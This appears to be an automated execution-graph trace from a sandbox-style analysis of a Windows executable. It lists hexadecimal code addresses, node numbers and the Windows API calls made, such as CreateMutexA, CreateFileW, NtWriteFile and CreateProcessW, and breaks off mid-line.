                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:44%
                                                                                                        Total number of Nodes:870
                                                                                                        Total number of Limit Nodes:23
                                                                                                        execution_graph 123404 7ff79e8f18ff 123407 7ff79e9272a0 123404->123407 123408 7ff79e9272c1 123407->123408 123409 7ff79e9272d6 SetThreadDescription 123408->123409 123418 7ff79e927ee0 123409->123418 123411 7ff79e9272fb 123433 7ff79e9276c0 123411->123433 123415 7ff79e8f1928 123473 7ff79e97e5e0 98 API calls 123418->123473 123420 7ff79e927f01 123421 7ff79e927f21 123420->123421 123474 7ff79e8f3e00 123420->123474 123423 7ff79e927f29 123421->123423 123424 7ff79e927f93 123421->123424 123426 7ff79e927f75 123423->123426 123479 7ff79e927d40 98 API calls 123423->123479 123478 7ff79e97a470 98 API calls 123424->123478 123426->123411 123428 7ff79e927f9e 123480 7ff79e99d100 6 API calls 123428->123480 123430 7ff79e927fba 123481 7ff79e99d100 6 API calls 123430->123481 123432 7ff79e927fd4 123432->123411 123489 7ff79e95c340 98 API calls 123433->123489 123435 7ff79e9276f0 123436 7ff79e927739 123435->123436 123437 7ff79e9276f5 123435->123437 123491 7ff79e9877f0 98 API calls 123436->123491 123438 7ff79e9276fb 123437->123438 123439 7ff79e927770 123437->123439 123490 7ff79e95c250 98 API calls 123438->123490 123492 7ff79e935360 98 API calls 123439->123492 123443 7ff79e927717 123444 7ff79e927303 123443->123444 123493 7ff79e987030 98 API calls 123443->123493 123469 7ff79e8f192e 123444->123469 123494 7ff79e8f1941 123469->123494 123472 7ff79e955220 101 API calls 123472->123415 123473->123420 123475 7ff79e940600 123474->123475 123482 7ff79e942cf0 123475->123482 123478->123428 123480->123430 123481->123432 123483 7ff79e942ccb HeapAlloc 123482->123483 123484 7ff79e942cb0 GetProcessHeap 123482->123484 123487 7ff79eacbb18 123483->123487 123484->123483 123488 7ff79e940635 123484->123488 123488->123421 123489->123435 123490->123443 123492->123443 123499 7ff79e8f2fe9 123494->123499 123589 7ff79e8f36b8 123494->123589 123639 7ff79e8f36ab 123494->123639 123495 7ff79e8f193a 123495->123415 123495->123472 123500 7ff79e8f300a 123499->123500 123501 7ff79e8f3012 123499->123501 123692 7ff79e8f1893 98 API calls 123500->123692 123503 7ff79e8f305a 123501->123503 123504 7ff79e8f302e 123501->123504 123693 7ff79e98d4c0 98 API calls 123501->123693 123689 7ff79e98d530 123503->123689 123504->123495 123506 7ff79e8f3069 123508 7ff79e97aed0 101 API calls 123506->123508 123509 7ff79e8f30a1 123508->123509 123510 7ff79e8f3c95 123509->123510 123511 7ff79e8f30aa CreateMutexA GetLastError 123509->123511 123514 7ff79e9877f0 98 API calls 123510->123514 123512 7ff79e8f30fb 123511->123512 123513 7ff79e8f30d9 123511->123513 123515 7ff79e8f3e48 99 API calls 123512->123515 123513->123495 123516 7ff79e8f3ccf 123514->123516 123517 7ff79e8f310b 123515->123517 123518 7ff79e987030 98 API calls 123516->123518 123517->123516 123519 7ff79e8f3114 123517->123519 123520 7ff79e8f3ce2 123518->123520 123521 7ff79e8f74eb 98 API calls 123519->123521 123522 7ff79e987210 98 API calls 123520->123522 123531 7ff79e8f3159 123521->123531 123523 7ff79e8f3d17 123522->123523 123524 7ff79e9877f0 98 API calls 123523->123524 123525 7ff79e8f3d46 123524->123525 123526 7ff79e987290 98 API calls 123525->123526 123527 7ff79e8f3d5e 123526->123527 123528 7ff79e987010 98 API calls 123527->123528 123530 7ff79e8f3d6a 123528->123530 123529 7ff79e8f1f75 98 API calls 123529->123531 123531->123529 123532 7ff79e8f21bf 99 API calls 123531->123532 123533 7ff79e8f31c6 123531->123533 123532->123531 123534 7ff79e93b8e0 104 API calls 123533->123534 123535 7ff79e8f320d 123534->123535 123536 7ff79e8f20ea 105 API calls 123535->123536 123537 7ff79e8f3270 123536->123537 123538 7ff79e93b8e0 104 API calls 123537->123538 123539 7ff79e8f329b 123538->123539 123540 7ff79e8f1fb8 99 API calls 123539->123540 123541 7ff79e8f32cd 123540->123541 123542 7ff79e8fd80b 98 API calls 123541->123542 123543 7ff79e8f3318 123542->123543 123544 7ff79e97a450 98 API calls 123543->123544 123545 7ff79e8f336c 123543->123545 123544->123545 123546 7ff79e8fcfbf 101 API calls 123545->123546 123547 7ff79e8f347c 123546->123547 123548 7ff79e8f1496 99 API calls 123547->123548 123554 7ff79e8f352e 123548->123554 123549 7ff79e8f372d 123551 7ff79e92bbf0 103 API calls 123549->123551 123588 7ff79e8f3536 123549->123588 123550 7ff79e8f1496 99 API calls 123550->123554 123560 7ff79e8f375f 123551->123560 123552 7ff79e8f3658 memset 123552->123554 123553 7ff79e8f5d25 GetProcessHeap HeapAlloc 123553->123554 123554->123525 123554->123549 123554->123550 123554->123552 123554->123553 123554->123588 123555 7ff79e8f388c 123556 7ff79e8f20ea 105 API calls 123555->123556 123557 7ff79e8f38ef 123556->123557 123559 7ff79e8f20ea 105 API calls 123557->123559 123558 7ff79e8f21bf 99 API calls 123558->123560 123563 7ff79e8f3966 123559->123563 123560->123523 123560->123555 123560->123558 123561 7ff79e8f3881 123560->123561 123562 7ff79e8f3d6b 98 API calls 123560->123562 123561->123520 123561->123555 123562->123560 123564 7ff79e94b1e0 99 API calls 123563->123564 123565 7ff79e8f3a07 123564->123565 123566 7ff79e94b300 101 API calls 123565->123566 123567 7ff79e8f3a1f 123566->123567 123568 7ff79e93c410 267 API calls 123567->123568 123569 7ff79e8f3a39 123568->123569 123570 7ff79e8f1f14 98 API calls 123569->123570 123571 7ff79e8f3a53 123570->123571 123572 7ff79e8f1a31 98 API calls 123571->123572 123573 7ff79e8f3a5b 123572->123573 123574 7ff79e94b1e0 99 API calls 123573->123574 123573->123588 123575 7ff79e8f3af9 123574->123575 123576 7ff79e94b300 101 API calls 123575->123576 123577 7ff79e8f3b43 123576->123577 123578 7ff79e94b300 101 API calls 123577->123578 123579 7ff79e8f3bdd 123578->123579 123579->123527 123580 7ff79e8f3c02 123579->123580 123581 7ff79e94b300 101 API calls 123580->123581 123582 7ff79e8f3c1f 123581->123582 123583 7ff79e93c410 267 API calls 123582->123583 123584 7ff79e8f3c2a 123583->123584 123585 7ff79e8f1f14 98 API calls 123584->123585 123586 7ff79e8f3c44 123585->123586 123587 7ff79e8f1a31 98 API calls 123586->123587 123587->123588 123588->123495 123593 7ff79e8f35d8 123589->123593 123590 7ff79e8f3658 memset 123590->123593 123591 7ff79e8f3d46 123833 7ff79e987290 98 API calls 123591->123833 123593->123590 123593->123591 123596 7ff79e8f372d 123593->123596 123599 7ff79e8f3536 123593->123599 123695 7ff79e8f5d25 123593->123695 123817 7ff79e8f1496 123593->123817 123594 7ff79e8f3d5e 123834 7ff79e987010 98 API calls 123594->123834 123596->123599 123699 7ff79e92bbf0 123596->123699 123599->123495 123602 7ff79e8f3d17 123832 7ff79e9877f0 98 API calls 123602->123832 123604 7ff79e8f388c 123714 7ff79e8f20ea 123604->123714 123606 7ff79e8f38ef 123608 7ff79e8f20ea 105 API calls 123606->123608 123614 7ff79e8f3966 123608->123614 123609 7ff79e8f375f 123609->123602 123609->123604 123610 7ff79e8f3881 123609->123610 123612 7ff79e8f3d6b 98 API calls 123609->123612 123825 7ff79e8f21bf 123609->123825 123610->123604 123611 7ff79e8f3ce2 123610->123611 123831 7ff79e987210 98 API calls 123611->123831 123612->123609 123721 7ff79e94b1e0 123614->123721 123616 7ff79e8f3a07 123730 7ff79e94b300 123616->123730 123624 7ff79e8f3a5b 123624->123599 123625 7ff79e94b1e0 99 API calls 123624->123625 123626 7ff79e8f3af9 123625->123626 123627 7ff79e94b300 101 API calls 123626->123627 123628 7ff79e8f3b43 123627->123628 123629 7ff79e94b300 101 API calls 123628->123629 123630 7ff79e8f3bdd 123629->123630 123630->123594 123631 7ff79e8f3c02 123630->123631 123632 7ff79e94b300 101 API calls 123631->123632 123633 7ff79e8f3c1f 123632->123633 123634 7ff79e93c410 267 API calls 123633->123634 123635 7ff79e8f3c2a 123634->123635 123636 7ff79e8f1f14 98 API calls 123635->123636 123637 7ff79e8f3c44 123636->123637 123638 7ff79e8f1a31 98 API calls 123637->123638 123638->123599 123643 7ff79e8f35d8 123639->123643 123640 7ff79e8f3658 memset 123640->123643 123641 7ff79e8f3d46 124633 7ff79e987290 98 API calls 123641->124633 123643->123639 123643->123640 123643->123641 123646 7ff79e8f372d 123643->123646 123648 7ff79e8f1496 99 API calls 123643->123648 123649 7ff79e8f5d25 2 API calls 123643->123649 123673 7ff79e8f3536 123643->123673 123644 7ff79e8f3d5e 124634 7ff79e987010 98 API calls 123644->124634 123650 7ff79e92bbf0 103 API calls 123646->123650 123646->123673 123648->123643 123649->123643 123659 7ff79e8f375f 123650->123659 123651 7ff79e8f3d17 124632 7ff79e9877f0 98 API calls 123651->124632 123653 7ff79e8f388c 123654 7ff79e8f20ea 105 API calls 123653->123654 123655 7ff79e8f38ef 123654->123655 123657 7ff79e8f20ea 105 API calls 123655->123657 123656 7ff79e8f21bf 99 API calls 123656->123659 123663 7ff79e8f3966 123657->123663 123658 7ff79e8f3d6b 98 API calls 123658->123659 123659->123651 123659->123653 123659->123656 123659->123658 123660 7ff79e8f3881 123659->123660 123660->123653 123661 7ff79e8f3ce2 123660->123661 124631 7ff79e987210 98 API calls 123661->124631 123664 7ff79e94b1e0 99 API calls 123663->123664 123665 7ff79e8f3a07 123664->123665 123666 7ff79e94b300 101 API calls 123665->123666 123667 7ff79e8f3a1f 123666->123667 123668 7ff79e93c410 267 API calls 123667->123668 123669 7ff79e8f3a39 123668->123669 123670 7ff79e8f1f14 98 API calls 123669->123670 123671 7ff79e8f3a53 123670->123671 123672 7ff79e8f1a31 98 API calls 123671->123672 123674 7ff79e8f3a5b 123672->123674 123673->123495 123674->123673 123675 7ff79e94b1e0 99 API calls 123674->123675 123676 7ff79e8f3af9 123675->123676 123677 7ff79e94b300 101 API calls 123676->123677 123678 7ff79e8f3b43 123677->123678 123679 7ff79e94b300 101 API calls 123678->123679 123680 7ff79e8f3bdd 123679->123680 123680->123644 123681 7ff79e8f3c02 123680->123681 123682 7ff79e94b300 101 API calls 123681->123682 123683 7ff79e8f3c1f 123682->123683 123684 7ff79e93c410 267 API calls 123683->123684 123685 7ff79e8f3c2a 123684->123685 123686 7ff79e8f1f14 98 API calls 123685->123686 123687 7ff79e8f3c44 123686->123687 123688 7ff79e8f1a31 98 API calls 123687->123688 123688->123673 123694 7ff79e987210 98 API calls 123689->123694 123692->123501 123696 7ff79e8f5d3f 123695->123696 123697 7ff79e8f5d44 123695->123697 123835 7ff79e8f744b 123696->123835 123697->123593 123844 7ff79e943750 123699->123844 123701 7ff79e92bc4b 123701->123609 123704 7ff79e92bc43 123704->123701 123705 7ff79e92be03 CloseHandle 123704->123705 123706 7ff79e92be29 123704->123706 123857 7ff79e947000 123704->123857 123705->123701 123865 7ff79e98d450 98 API calls 123706->123865 123715 7ff79e8f2100 123714->123715 123716 7ff79e8f2119 123715->123716 123717 7ff79e8f210a 123715->123717 124000 7ff79e97b9b0 123716->124000 124074 7ff79e8f1fb8 123717->124074 123719 7ff79e8f2121 123719->123606 123722 7ff79e94b1fc 123721->123722 123723 7ff79e94b22b memcpy 123721->123723 123724 7ff79e94b2ee 123722->123724 123726 7ff79e8f3e00 2 API calls 123722->123726 123723->123616 124099 7ff79e97a450 98 API calls 123724->124099 123727 7ff79e94b222 123726->123727 123727->123723 123727->123724 123731 7ff79e94b31c 123730->123731 123732 7ff79e94b347 memcpy 123730->123732 123733 7ff79e94b3aa 123731->123733 123735 7ff79e8f3e00 2 API calls 123731->123735 123736 7ff79e94b369 123732->123736 123737 7ff79e8f3a1f 123732->123737 124101 7ff79e97a450 98 API calls 123733->124101 123739 7ff79e94b342 123735->123739 124100 7ff79e917ab0 98 API calls 123736->124100 123754 7ff79e93c410 123737->123754 123739->123732 123739->123733 124102 7ff79e94b630 123754->124102 123756 7ff79e93c44f 123757 7ff79e8f3a39 123756->123757 123758 7ff79e93c497 123756->123758 123759 7ff79e93c492 CloseHandle 123756->123759 123805 7ff79e8f1f14 123757->123805 123760 7ff79e93c4ed 123758->123760 123761 7ff79e93c545 123758->123761 123759->123758 123762 7ff79e93c4f2 123760->123762 123763 7ff79e93c56f 123760->123763 123764 7ff79e93c54a 123761->123764 123765 7ff79e93c597 WaitForSingleObject 123761->123765 124382 7ff79e94a490 123762->124382 124402 7ff79e94a0b0 99 API calls 123763->124402 124401 7ff79e94a0b0 99 API calls 123764->124401 123768 7ff79e93c5a8 GetLastError 123765->123768 123769 7ff79e93c5ed 123765->123769 123773 7ff79e93c5b9 123768->123773 123769->123768 123778 7ff79e93c5d5 123769->123778 123771 7ff79e93c586 123775 7ff79e93c6cc 123771->123775 123776 7ff79e93c56a CloseHandle 123771->123776 123773->123778 123774 7ff79e93c561 123774->123776 123779 7ff79e93c698 123774->123779 124404 7ff79e9877f0 98 API calls 123775->124404 123776->123765 123777 7ff79e93c50e 124400 7ff79e9877f0 98 API calls 123777->124400 123784 7ff79e93c630 CloseHandle CloseHandle 123778->123784 124403 7ff79e9877f0 98 API calls 123779->124403 123785 7ff79e93c646 123784->123785 123785->123757 123806 7ff79e8f1f4d 123805->123806 123807 7ff79e8f1f27 123805->123807 124609 7ff79e9877f0 98 API calls 123806->124609 123810 7ff79e8f1a31 123807->123810 123814 7ff79e8f1a49 123810->123814 123811 7ff79e8f1d6d 124611 7ff79e987010 98 API calls 123811->124611 123814->123811 123816 7ff79e8f1d10 123814->123816 124610 7ff79e987010 98 API calls 123814->124610 123816->123624 123824 7ff79e8f14ce 123817->123824 123818 7ff79e8f155e 124617 7ff79e98d4c0 98 API calls 123818->124617 123819 7ff79e8f1537 123820 7ff79e8f152a 123819->123820 124612 7ff79e8f213e 123819->124612 123820->123593 123824->123818 123824->123819 123824->123820 123826 7ff79e8f21cf 123825->123826 124625 7ff79e8f1450 123826->124625 123829 7ff79e8f213e 99 API calls 123830 7ff79e8f2288 123829->123830 123830->123609 123836 7ff79e8f745e 123835->123836 123838 7ff79e8f7457 123835->123838 123839 7ff79e8f73a0 123836->123839 123838->123697 123840 7ff79e8f73b7 123839->123840 123842 7ff79e8f73cd 123839->123842 123840->123842 123843 7ff79e8f7373 GetProcessHeap HeapAlloc 123840->123843 123842->123838 123843->123842 123866 7ff79e951a40 123844->123866 123846 7ff79e943783 123856 7ff79e943790 123846->123856 123912 7ff79e953f30 123846->123912 123848 7ff79e943991 123852 7ff79e943996 GetLastError 123848->123852 123849 7ff79e943898 CreateFileW 123850 7ff79e9438da 123849->123850 123851 7ff79e94394c GetLastError 123849->123851 123854 7ff79e9438e9 GetLastError 123850->123854 123850->123856 123851->123856 123852->123856 123853 7ff79e9437ba 123853->123848 123853->123849 123853->123856 123855 7ff79e9438f5 SetFileInformationByHandle 123854->123855 123854->123856 123855->123852 123855->123856 123856->123704 123858 7ff79e947038 NtWriteFile 123857->123858 123859 7ff79e947030 123857->123859 123860 7ff79e94707d WaitForSingleObject 123858->123860 123863 7ff79e947094 123858->123863 123859->123858 123861 7ff79e9470c0 123860->123861 123860->123863 123999 7ff79e935360 98 API calls 123861->123999 123863->123704 123864 7ff79e9470fa 123867 7ff79e951a69 123866->123867 123868 7ff79e951aa3 123866->123868 123869 7ff79e951bbc 123867->123869 123871 7ff79e8f3e00 2 API calls 123867->123871 123980 7ff79e9209f0 123868->123980 123988 7ff79e97a450 98 API calls 123869->123988 123873 7ff79e951a9a 123871->123873 123873->123868 123873->123869 123878 7ff79e951b51 123878->123846 123916 7ff79e953f59 123912->123916 123913 7ff79e9540e3 SetLastError GetFullPathNameW 123915 7ff79e95410c GetLastError 123913->123915 123913->123916 123915->123916 123917 7ff79e9541b2 GetLastError 123915->123917 123916->123913 123918 7ff79e954125 GetLastError 123916->123918 123920 7ff79e95415d 123916->123920 123921 7ff79e953f9d 123916->123921 123994 7ff79e917020 98 API calls 123916->123994 123917->123921 123918->123916 123919 7ff79e954534 123918->123919 123996 7ff79e987290 98 API calls 123919->123996 123923 7ff79e95454e 123920->123923 123924 7ff79e954166 123920->123924 123921->123853 123997 7ff79e98d4c0 98 API calls 123923->123997 123929 7ff79e954302 123924->123929 123937 7ff79e954189 123924->123937 123926 7ff79e95430f 123927 7ff79e954321 123926->123927 123995 7ff79e917020 98 API calls 123926->123995 123931 7ff79e9543f6 memcpy 123927->123931 123928 7ff79e9542b6 memcpy 123928->123926 123928->123931 123929->123926 123934 7ff79e916e30 2 API calls 123929->123934 123931->123921 123935 7ff79e954420 123931->123935 123938 7ff79e9544ed 123934->123938 123939 7ff79e917950 2 API calls 123935->123939 123937->123928 123942 7ff79e916e30 2 API calls 123937->123942 123938->123926 123943 7ff79e954565 123938->123943 123939->123921 123945 7ff79e9543a2 123942->123945 123998 7ff79e97a450 98 API calls 123943->123998 123945->123928 123945->123943 123983 7ff79e920a20 123980->123983 123982 7ff79e920b56 123982->123878 123984 7ff79e917950 123982->123984 123983->123982 123989 7ff79e917020 98 API calls 123983->123989 123985 7ff79e917965 123984->123985 123990 7ff79e916e30 123985->123990 123987 7ff79e9179c1 123987->123878 123989->123982 123991 7ff79e916e5b 123990->123991 123992 7ff79e916e45 123990->123992 123991->123987 123992->123991 123993 7ff79e8f3e00 2 API calls 123992->123993 123993->123991 123994->123916 123995->123927 123999->123864 124001 7ff79e97ba97 124000->124001 124004 7ff79e97b9d2 124000->124004 124002 7ff79e97bacc 124001->124002 124008 7ff79e97ba9c 124001->124008 124081 7ff79e9877f0 98 API calls 124001->124081 124002->123719 124004->124001 124005 7ff79e8f3e00 2 API calls 124004->124005 124004->124008 124005->124001 124082 7ff79e97a450 98 API calls 124008->124082 124083 7ff79e8fda67 124074->124083 124076 7ff79e8f1fdf 124077 7ff79e8f2016 124076->124077 124078 7ff79e8f1fe9 memcpy 124076->124078 124087 7ff79e97a450 98 API calls 124077->124087 124078->123719 124084 7ff79e8fda75 124083->124084 124086 7ff79e8fda8c 124083->124086 124084->124086 124088 7ff79e8fd8cd 124084->124088 124086->124076 124089 7ff79e8fd8ed 124088->124089 124090 7ff79e8fd8dd 124088->124090 124089->124086 124091 7ff79e8fd8e2 124090->124091 124092 7ff79e8fd8ef 124090->124092 124095 7ff79e8f3e30 124091->124095 124094 7ff79e8f3e00 2 API calls 124092->124094 124094->124089 124096 7ff79e940730 124095->124096 124097 7ff79e942cf0 2 API calls 124096->124097 124098 7ff79e940767 124097->124098 124098->124089 124100->123737 124103 7ff79e94b683 124102->124103 124105 7ff79e94f238 GetLastError 124103->124105 124131 7ff79e94b688 124103->124131 124140 7ff79e94b6d5 124103->124140 124148 7ff79e94b80e 124103->124148 124554 7ff79e987210 98 API calls 124105->124554 124107 7ff79e94beb7 124109 7ff79e8f3e00 2 API calls 124107->124109 124113 7ff79e94bf02 124109->124113 124111 7ff79e94c44c 124111->123756 124112 7ff79e94c443 CloseHandle 124112->124111 124119 7ff79e94f2ab 124113->124119 124499 7ff79e920b70 98 API calls 124113->124499 124114 7ff79e94bac3 memcpy 124114->124148 124116 7ff79e94b7f4 FreeEnvironmentStringsW 124116->124148 124117 7ff79e94f37e CloseHandle 124124 7ff79e94f3ac CloseHandle 124117->124124 124118 7ff79e94f16e 124546 7ff79e97a450 98 API calls 124118->124546 124555 7ff79e97a450 98 API calls 124119->124555 124129 7ff79e94f42d 124124->124129 124130 7ff79e94f3bd CloseHandle 124124->124130 124125 7ff79e94c177 124134 7ff79e94c19b 124125->124134 124164 7ff79e94c2e4 124125->124164 124126 7ff79e94f181 124547 7ff79e97a450 98 API calls 124126->124547 124127 7ff79e94bb49 memcpy 124127->124148 124133 7ff79e908790 CloseHandle CloseHandle 124129->124133 124130->124129 124131->124125 124146 7ff79e94c1cb 124131->124146 124131->124164 124372 7ff79e94c3c0 124131->124372 124136 7ff79e94f439 124133->124136 124134->124119 124147 7ff79e8f3e00 2 API calls 124134->124147 124135 7ff79e915ea0 106 API calls 124135->124148 124141 7ff79e907710 98 API calls 124136->124141 124137 7ff79e94f194 124548 7ff79e97a450 98 API calls 124137->124548 124139 7ff79e94bbc9 memcpy 124498 7ff79e9110d0 136 API calls 124139->124498 124140->124116 124493 7ff79e948c30 99 API calls 124140->124493 124494 7ff79e920b70 98 API calls 124140->124494 124495 7ff79e9110d0 136 API calls 124140->124495 124151 7ff79e94f445 124141->124151 124142 7ff79e8f3e00 GetProcessHeap HeapAlloc 124142->124148 124145 7ff79e94bfd5 CompareStringOrdinal 124153 7ff79e94bf42 124145->124153 124146->124134 124149 7ff79e94c1cf 124146->124149 124150 7ff79e94c231 124147->124150 124148->124107 124148->124114 124148->124118 124148->124126 124148->124127 124148->124135 124148->124137 124148->124139 124148->124142 124155 7ff79e94f1c4 124148->124155 124496 7ff79e905340 98 API calls 124148->124496 124497 7ff79e916860 100 API calls 124148->124497 124154 7ff79e951a40 98 API calls 124149->124154 124150->124119 124156 7ff79e94c23a memcpy 124150->124156 124174 7ff79e94f829 124151->124174 124180 7ff79e907630 100 API calls 124151->124180 124152 7ff79e94c04c 124152->124131 124158 7ff79e94f0e9 GetLastError 124152->124158 124153->124131 124153->124145 124153->124152 124199 7ff79e94c2b5 124153->124199 124159 7ff79e94c1de 124154->124159 124550 7ff79e987290 98 API calls 124155->124550 124500 7ff79e952fb0 100 API calls 124156->124500 124545 7ff79e987210 98 API calls 124158->124545 124181 7ff79e94c1f9 124159->124181 124503 7ff79e943310 124159->124503 124162 7ff79e94c275 124166 7ff79e94fa90 111 API calls 124162->124166 124212 7ff79e94d290 124164->124212 124164->124372 124521 7ff79e948dd0 124164->124521 124165 7ff79e94c58f CloseHandle 124165->124117 124170 7ff79e94c293 124166->124170 124169 7ff79e94c596 124172 7ff79e951a40 98 API calls 124169->124172 124170->124181 124501 7ff79e93aa90 98 API calls 124170->124501 124171 7ff79e94d29c 124215 7ff79e94d2b2 124171->124215 124444 7ff79e93a960 124171->124444 124176 7ff79e94c5ad 124172->124176 124173 7ff79e94c86e 124187 7ff79e94c899 124173->124187 124238 7ff79e94c7be 124173->124238 124184 7ff79e94f928 124174->124184 124185 7ff79e94f918 CloseHandle 124174->124185 124176->124181 124186 7ff79e943310 111 API calls 124176->124186 124177 7ff79e94c748 SetLastError GetFullPathNameW 124177->124181 124182 7ff79e94c76a GetLastError 124177->124182 124178 7ff79e94c577 124516 7ff79e987290 98 API calls 124178->124516 124180->124174 124181->124173 124181->124177 124191 7ff79e94c783 GetLastError 124181->124191 124196 7ff79e94c7b5 124181->124196 124181->124372 124517 7ff79e917020 98 API calls 124181->124517 124182->124181 124190 7ff79e94c8f0 GetLastError 124182->124190 124193 7ff79e99d100 6 API calls 124184->124193 124185->124184 124186->124181 124187->124190 124188 7ff79e94ca80 124200 7ff79e917950 2 API calls 124188->124200 124190->124372 124191->124181 124197 7ff79e94f1a7 124191->124197 124192 7ff79e94db87 124195 7ff79e939670 98 API calls 124192->124195 124198 7ff79e94f934 124193->124198 124194 7ff79e939670 98 API calls 124221 7ff79e94d272 124194->124221 124201 7ff79e94dbb1 124195->124201 124205 7ff79e94f2ba 124196->124205 124196->124238 124549 7ff79e987290 98 API calls 124197->124549 124207 7ff79e987520 98 API calls 124198->124207 124199->124169 124199->124178 124208 7ff79e94cabd 124200->124208 124211 7ff79e94dbd1 124201->124211 124222 7ff79e93a360 101 API calls 124201->124222 124203 7ff79e94ca1a SetLastError GetSystemDirectoryW 124213 7ff79e94c948 124203->124213 124214 7ff79e94ca30 GetLastError 124203->124214 124204 7ff79e94dcf7 SetLastError GetSystemDirectoryW 124204->124215 124216 7ff79e94dd0f GetLastError 124204->124216 124556 7ff79e98d4c0 98 API calls 124205->124556 124206 7ff79e94d2e6 124206->124192 124217 7ff79e94d312 124206->124217 124219 7ff79e94f939 124207->124219 124220 7ff79e9209f0 98 API calls 124208->124220 124210 7ff79e94fa90 111 API calls 124210->124221 124223 7ff79e94fa90 111 API calls 124211->124223 124419 7ff79e949030 124212->124419 124213->124203 124228 7ff79e94ca4e GetLastError 124213->124228 124232 7ff79e94cbc1 124213->124232 124518 7ff79e917020 98 API calls 124213->124518 124214->124213 124226 7ff79e94cbfb GetLastError 124214->124226 124215->124204 124229 7ff79e94dd28 GetLastError 124215->124229 124233 7ff79e94dd5a 124215->124233 124240 7ff79e94de72 124215->124240 124531 7ff79e917020 98 API calls 124215->124531 124216->124215 124227 7ff79e94de8f GetLastError 124216->124227 124230 7ff79e987290 98 API calls 124217->124230 124237 7ff79e93fcf0 98 API calls 124219->124237 124231 7ff79e94caf9 124220->124231 124221->124194 124221->124210 124221->124212 124221->124240 124248 7ff79e948dd0 98 API calls 124221->124248 124527 7ff79e93a360 101 API calls 124221->124527 124222->124211 124223->124215 124226->124372 124277 7ff79e94ddd5 124227->124277 124228->124213 124234 7ff79e94f1e1 124228->124234 124229->124215 124235 7ff79e94f1fe 124229->124235 124230->124165 124239 7ff79e917950 2 API calls 124231->124239 124253 7ff79e94cb15 124231->124253 124241 7ff79e94cbca 124232->124241 124242 7ff79e94f2d1 124232->124242 124245 7ff79e94f303 124233->124245 124246 7ff79e94dd63 124233->124246 124551 7ff79e987290 98 API calls 124234->124551 124552 7ff79e987290 98 API calls 124235->124552 124236 7ff79e94c43c 124236->124111 124236->124112 124308 7ff79e94f96b 124237->124308 124238->124188 124238->124213 124239->124253 124240->124227 124249 7ff79e94cbf6 memcpy 124241->124249 124254 7ff79e8f3e00 2 API calls 124241->124254 124557 7ff79e98d4c0 98 API calls 124242->124557 124560 7ff79e98d4c0 98 API calls 124245->124560 124447 7ff79e9375f0 124246->124447 124248->124221 124278 7ff79e94cc89 124249->124278 124252 7ff79e94fa43 124252->123756 124257 7ff79e917950 2 API calls 124253->124257 124265 7ff79e94cc30 124253->124265 124253->124372 124405 7ff79e942e70 124253->124405 124259 7ff79e94cbed 124254->124259 124257->124253 124259->124249 124263 7ff79e94f2f4 124259->124263 124260 7ff79e94dfb7 SetLastError GetWindowsDirectoryW 124266 7ff79e94dfcf GetLastError 124260->124266 124260->124277 124262 7ff79e94dd95 124267 7ff79e94ddb8 124262->124267 124273 7ff79e93a360 101 API calls 124262->124273 124559 7ff79e97a450 98 API calls 124263->124559 124264 7ff79e94d152 124281 7ff79e917950 2 API calls 124264->124281 124303 7ff79e94d43f 124264->124303 124371 7ff79e94d1e6 124264->124371 124265->124264 124272 7ff79e917950 2 API calls 124265->124272 124265->124372 124269 7ff79e94e156 GetLastError 124266->124269 124266->124277 124274 7ff79e94fa90 111 API calls 124267->124274 124293 7ff79e94e106 124269->124293 124270 7ff79e94dfe8 GetLastError 124276 7ff79e94f21b 124270->124276 124270->124277 124272->124264 124273->124267 124274->124277 124275 7ff79e94e01a 124279 7ff79e94f31a 124275->124279 124280 7ff79e94e023 124275->124280 124553 7ff79e987290 98 API calls 124276->124553 124277->124260 124277->124270 124277->124275 124317 7ff79e94e092 124277->124317 124532 7ff79e917020 98 API calls 124277->124532 124288 7ff79e94cdb6 124278->124288 124519 7ff79e917020 98 API calls 124278->124519 124561 7ff79e98d4c0 98 API calls 124279->124561 124289 7ff79e9375f0 98 API calls 124280->124289 124281->124371 124284 7ff79e94ec17 124540 7ff79e954b30 WaitOnAddress GetLastError 124284->124540 124285 7ff79e94d4a5 124323 7ff79e94d4ce 124285->124323 124528 7ff79e941530 98 API calls 124285->124528 124286 7ff79e953550 101 API calls 124286->124308 124287 7ff79e93fcf0 98 API calls 124287->124308 124291 7ff79e94f2e5 124288->124291 124296 7ff79e8f3e00 2 API calls 124288->124296 124288->124372 124294 7ff79e94e039 124289->124294 124558 7ff79e97a450 98 API calls 124291->124558 124472 7ff79e929c40 124293->124472 124301 7ff79e939670 98 API calls 124294->124301 124302 7ff79e94cef9 124296->124302 124305 7ff79e94e052 124301->124305 124302->124291 124318 7ff79e94cf02 124302->124318 124316 7ff79e94d465 124303->124316 124303->124372 124539 7ff79e920b70 98 API calls 124303->124539 124304 7ff79e94eb21 124311 7ff79e917950 2 API calls 124304->124311 124304->124316 124309 7ff79e94e075 124305->124309 124533 7ff79e93a360 101 API calls 124305->124533 124306 7ff79e94e9a2 124538 7ff79e906fd0 100 API calls 124306->124538 124308->124252 124308->124286 124308->124287 124467 7ff79e94fa90 124309->124467 124310 7ff79e94e954 124319 7ff79e94efad CloseHandle 124310->124319 124320 7ff79e94efb9 124310->124320 124311->124316 124314 7ff79e94e9ad 124314->124303 124321 7ff79e917950 2 API calls 124314->124321 124315 7ff79e94d086 124325 7ff79e917950 2 API calls 124315->124325 124354 7ff79e94d0b1 124315->124354 124316->124284 124316->124285 124316->124372 124317->124269 124317->124293 124318->124315 124520 7ff79e917020 98 API calls 124318->124520 124319->124320 124326 7ff79e94efc3 CloseHandle 124320->124326 124327 7ff79e94efcf 124320->124327 124321->124303 124323->124310 124324 7ff79e94e98b 124323->124324 124335 7ff79e94ece6 124323->124335 124345 7ff79e94eb98 124323->124345 124541 7ff79e9503a0 102 API calls 124323->124541 124330 7ff79e94ef86 CloseHandle 124324->124330 124325->124354 124326->124327 124331 7ff79e94efd9 CloseHandle 124327->124331 124332 7ff79e94efe5 124327->124332 124329 7ff79e94ed81 CreateProcessW 124336 7ff79e94ef14 GetLastError 124329->124336 124337 7ff79e94edd1 124329->124337 124330->124310 124338 7ff79e94ef97 CloseHandle 124330->124338 124331->124332 124339 7ff79e94effd 124332->124339 124340 7ff79e94f018 124332->124340 124334 7ff79e94e58f memcpy 124334->124371 124335->124329 124342 7ff79e94ef38 124335->124342 124341 7ff79e94ef72 CloseHandle 124336->124341 124336->124342 124343 7ff79e94ee1b CloseHandle CloseHandle CloseHandle 124337->124343 124344 7ff79e94ee08 124337->124344 124338->124310 124347 7ff79e94f016 124339->124347 124543 7ff79e941530 98 API calls 